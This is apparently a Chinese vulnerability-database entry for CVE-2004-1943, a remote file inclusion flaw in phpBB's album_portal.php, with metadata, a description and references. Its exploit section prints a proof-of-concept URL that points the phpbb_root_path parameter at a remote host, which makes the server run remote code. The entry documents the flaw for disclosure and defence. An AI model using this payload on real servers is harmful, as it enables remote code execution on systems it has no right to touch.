PHPBB album_portal.php远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1107887 漏洞类型 输入验证
发布时间 2004-04-19 更新时间 2006-09-28
CVE编号 CVE-2004-1943 CNNVD-ID CNNVD-200404-072
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/24026
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200404-072
|漏洞详情
phpBB是一款由PHP编写的WEB论坛应用程序,支持多种数据库系统,可使用在多种Unix和Linux操作系统下。phpBB包含的album_portal.php脚本对用户提交URI参数缺少充分过滤,远程攻击者利用这个漏洞以WEB进程权限执行任意命令。album_portal.php脚本在处理"album_root_path"参数时缺少充分过滤,攻击者提交远程服务上的恶意文件作为这个参数的包含文件,可导致以WEB进程权限执行恶意文件中的任意代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/10177/info

It has been reported that phpBB may be prone to a file include vulnerability that may allow remote attackers to include a remote malicious script to be executed on a vulnerable system.

http://www.example.com/album_portal.php?phpbb_root_path=http://www.example.com/&phpEx=/../../[example.php]
|参考资料

来源:BID
名称:10177
链接:http://www.securityfocus.com/bid/10177
来源:XF
名称:phpbb-albumportal-file-include(15916)
链接:http://xforce.iss.net/xforce/xfdb/15916
来源:BUGTRAQ
名称:20040419phpBBmodifiedbyPrzemoarbitarycodeexecution
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=108244738102532&w=2